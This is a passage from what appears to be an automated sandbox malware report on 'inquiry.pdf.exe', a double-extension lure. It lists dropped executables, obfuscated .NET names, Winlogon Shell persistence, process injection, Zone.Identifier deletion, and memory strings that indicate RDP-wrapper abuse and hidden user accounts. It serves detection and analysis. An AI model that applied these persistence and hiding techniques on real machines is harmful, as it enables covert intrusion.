Source: Yara match File source: 00000000.00000002.325693472.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: inquiry.pdf.exe PID: 5896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: glonkjhg.exe PID: 4760, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_0124D18F push dword ptr [ebp+ecx-75h]; retf 18_2_0124D19A
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_0124D238 push dword ptr [ebp+ebx-75h]; iretd 18_2_0124D205
Source: jhFFFffkl.exe.18.dr Static PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]
Source: inquiry.pdf.exe, Ao3y8/f0F3R.cs High entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
Source: 0.0.inquiry.pdf.exe.a90000.0.unpack, Ao3y8/f0F3R.cs High entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
Source: glonkjhg.exe.13.dr, Ao3y8/f0F3R.cs High entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
Source: jhFFFffkl.exe.18.dr, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.cs High entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
Source: jhFFFffkl.exe.18.dr, Astronotplart/gabKErPURPS76kDKjrme.cs High entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
Source: jhFFFffkl.exe.18.dr, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.cs High entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
Source: jhFFFffkl.exe.18.dr, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.cs High entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
Source: jhFFFffkl.exe.18.dr, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.cs High entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.cs High entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/gabKErPURPS76kDKjrme.cs High entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.cs High entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.cs High entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.cs High entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\glonkjhg.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Jump to dropped file

Boot Survival

Source: C:\Windows\SysWOW64\reg.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: C:\Users\user\Desktop\inquiry.pdf.exe File opened: C:\Users\user\Desktop\inquiry.pdf.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File opened: C:\Users\user\AppData\Roaming\glonkjhg.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: Possible double extension: pdf.exe Static PE information: inquiry.pdf.exe
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: <